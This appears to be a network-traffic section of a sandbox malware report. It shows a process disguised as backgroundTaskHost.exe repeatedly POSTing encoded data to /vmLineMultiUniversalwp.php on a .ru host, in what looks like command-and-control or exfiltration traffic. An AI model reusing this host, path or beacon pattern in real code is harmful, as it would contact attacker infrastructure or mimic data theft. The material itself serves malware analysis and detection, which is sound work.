                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1c 28 2e 27 08 21 11 38 1f 3d 10 00 1d 26 0e 2c 11 3b 31 3b 5e 22 3c 2b 12 2f 0b 31 5c 27 20 2c 1b 29 11 01 0c 21 23 20 0d 27 20 2a 5d 06 12 38 5e 2b 2f 25 04 32 38 22 56 3d 32 00 45 26 25 2a 5e 24 03 02 02 3e 3f 31 5d 26 3c 29 56 29 3f 26 58 2d 2a 0a 40 38 3f 30 51 36 13 21 53 08 13 20 1c 31 31 06 0a 28 33 21 5a 26 30 22 02 33 39 28 0f 28 3b 23 0b 24 10 32 5b 2e 57 20 04 28 23 3b 04 2e 58 38 16 3c 2e 23 1f 24 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(.'!8=&,;1;^"<+/1\' ,)!# ' *]8^+/%28"V=2E&%*^$>?1]&<)V)?&X-*@8?0Q6!S 11(3!Z&0"39((;#$2[.W (#;.X8<.#$,"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          43          192.168.2.4  49899        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:18.458326101 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:18.810959101 CET  2520               OUT        Data Raw: 51 59 5e 54 50 58 5f 57 5c 5b 52 58 57 5e 58 5f 58 52 5a 5c 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^TPX_W\[RXW^X_XRZ\RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-**/E48!%4*1Y6=9X&=<!-5+,?&']".=)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:18.929837942 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:19.200752974 CET  810                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XmAC6JFW2B6lIcP22qAUMMP%2FALhzYrvsaroGpn%2FxGj0YM%2F%2Baz41qcQr12bl5TVLdEu%2B1ChR8z6tACYERgXrtDzRmn4W6UPuieXqbwhubb1v4PDynvEmhvC0EmLp%2BbggIc8R8uFNW"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d35fa984263-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3596&min_rtt=1596&rtt_var=4599&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82963&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          44          192.168.2.4  49905        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:19.331334114 CET  293                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:19.686247110 CET  2520               OUT        Data Raw: 54 5a 5e 5e 55 5c 5a 52 5c 5b 52 58 57 5e 58 52 58 5c 5a 59 52 54 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^^U\ZR\[RXW^XRX\ZYRTQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)9(461;)<5["="'#R4>%),+]( "-_)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:19.784298897 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:20.050760031 CET  807                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aR2VZlQcF4XFrqD4z4rlyGtmsokpF9cp0R%2FwSyTOZzaReFx1oE1%2BFVp4eU43yb6UQd4vAlcohp%2BxZRZgYQv4JsPqDGfBCswsEXrvzF2tO8BhbmD7VqWyNS0a27jjHXQWM%2BzfaZIn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d3b587d41b4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9673&min_rtt=1662&rtt_var=16647&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=22202&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          45          192.168.2.4  49912        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:20.176198959 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:20.529714108 CET  2520               OUT        Data Raw: 51 5e 5e 54 55 53 5a 55 5c 5b 52 58 57 52 58 58 58 51 5a 59 52 50 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^TUSZU\[RXWRXXXQZYRPQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B)74%V1U()?%]![*&>R4:<?/^*&#]4>!);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:20.639211893 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:20.837555885 CET  808                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LrMwF56d2YdzUmi2fWXJV8oQCUy5IDhyY9zL8%2Fl9%2FdQtY59z%2BFznIub5dy%2BUAovkm0KV4iCXiDDwNdGtjsd9FsoY4GaawlfWNvH3%2FVnULstvbtJDTyt6NbApSaJplxXQbP7fRM9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d40bf594264-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4799&min_rtt=1862&rtt_var=6573&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=57566&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          46          192.168.2.4  49919        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:20.975486994 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:21.326695919 CET  2520               OUT        Data Raw: 51 5e 5e 56 55 5d 5a 5c 5c 5b 52 58 57 5b 58 5b 58 50 5a 5b 52 57 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^VU]Z\\[RXW[X[XPZ[RWQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B>_(4;)&4*-"13>Q7>*Q)?0+;#>-)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:21.435065985 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:21.610618114 CET  810                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2uq9kVnX%2BgKv85cwzmcYnyQ648sI%2FdjgMv3anntDiz79%2BIuXIbmsl6dMU01DZROvJQnvzUZ9F%2BQBfoSYP2nzv%2Fo0DWePUrNcppUUzlnYQzMIVwYm7l9wk5Np01OyY5O%2B8QdkSTN"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d45aae642da-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4698&min_rtt=1697&rtt_var=6639&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=56787&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          47          192.168.2.4  49925        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:21.737135887 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:22.093280077 CET  2520               OUT        Data Raw: 54 58 5b 57 55 58 5a 5c 5c 5b 52 58 57 59 58 52 58 51 5a 5a 52 52 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WUXZ\\[RXWYXRXQZZRRQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9 (>%#^><)X!Y3$7=:P(;]( "-"*!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:22.191092968 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:22.457642078 CET  801                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajmSgB2GeogeiHeTpgcXi5TuINV%2B6DCgmACRqOvPmRwzqsIgzCAMuuzxwDig9mkTHkdzjz8hwbUxLod5sXl1e6BIaqVApIgWzoHNVja6ESBzliDjdXlcKbrHvCdKCBg5rNol1llM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d4a6d3f729b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8004&min_rtt=1983&rtt_var=12787&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=29108&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                          48          192.168.2.4  49931        104.21.38.84    80                6020  C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:08:22.580794096 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:22.935976982 CET  2520               OUT        Data Raw: 54 5a 5e 5e 55 59 5a 56 5c 5b 52 58 57 5b 58 52 58 5c 5a 52 52 54 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^^UYZV\[RXW[XRX\ZRRTQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E(:/D#(!%#,><!Y!=0X7V >))<(3Z ["Y++!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:23.043191910 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:23.313716888 CET  813                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C1rvvr8N4jiAW%2BEInUDfTVW%2BgwPaZ24%2B8BM5VCnwI%2FwNsMH6PFYbaYFm1OEdsvF0NWkyysB8e%2FYUpij30tFnsw%2FKm0JcdgAIy4MQU9ujG1X7NZ76lqG5wCjauc1m%2FL0QzW4dIlag"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d4fbedb4251-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2930&min_rtt=1656&rtt_var=3170&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=123165&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          49    192.168.2.4    49940    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:23.439585924 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:23.795377970 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:23.903565884 CET    25    IN    HTTP/1.1 100 Continue


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          50    192.168.2.4    49942    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:24.005187035 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:24.357947111 CET    1844    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:24.458884954 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:24.716880083 CET    959    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1AVa6elpEfYxMMF%2FeyIO0Q%2FSZRB5mOIYSfxNXFjE%2FB9EHgAh4Attc3azQcj%2B79gsvIrRd7J7yvJ7U9z0rcLiJ8ov%2FUoCNjw6cabh64t4xFHxtDY%2FHsiREooZCFjrw6wYXiCo4n1G"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d589aca4316-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3579&min_rtt=1728&rtt_var=4351&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=88260&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          51    192.168.2.4    49946    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:24.143675089 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:24.498708963 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:24.596453905 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:24.779700041 CET    811    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDH7rKQz9DROcUFQV%2FsdwUBuAaIQWH%2FkrvOydk%2FnIOT%2B3OBhYHA27DjnJvUxwMYGhC4olkr1aIyVBKn2p2CDXYh2pnl%2B2qdDTbLoUemH%2F3vRXe6GdCJW2zZmNmVJQCA4A6k1piYn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d5978174207-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7890&min_rtt=1807&rtt_var=12844&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=28925&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          52    192.168.2.4    49952    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:24.920330048 CET    293    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:25.279809952 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:25.382719994 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:25.649338007 CET    802    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLJAW84gG0jjloh9CxYCaLsCtFJSNjC7kxAxNA78OXvatBCRJotKUHYHYaIKIUlB%2BMyi6mRqsPZqaXtDGElyhX00bzYVWwEpW9Lm5ejzwqTdgomAvNDa6sgsE%2FOoCfUvtHb966kR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d5e5a3f0cbc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3434&min_rtt=1595&rtt_var=4278&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=89493&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          53    192.168.2.4    49959    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:25.865648985 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:26.219058037 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:26.317733049 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:26.496916056 CET    806    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj1im37mNKXtNsGW%2BEgPXnRFUU45aTk797jTvVp0SXh0y5VTP%2BtfHFOBk5MiocubgeIpMV%2FFYP6J%2BnQPK1aPwLfInNTTIOuFY0Guy0BMoVZItznoXZxOcAzEeY4nOr3ueJBExfsp"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d643bee427c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
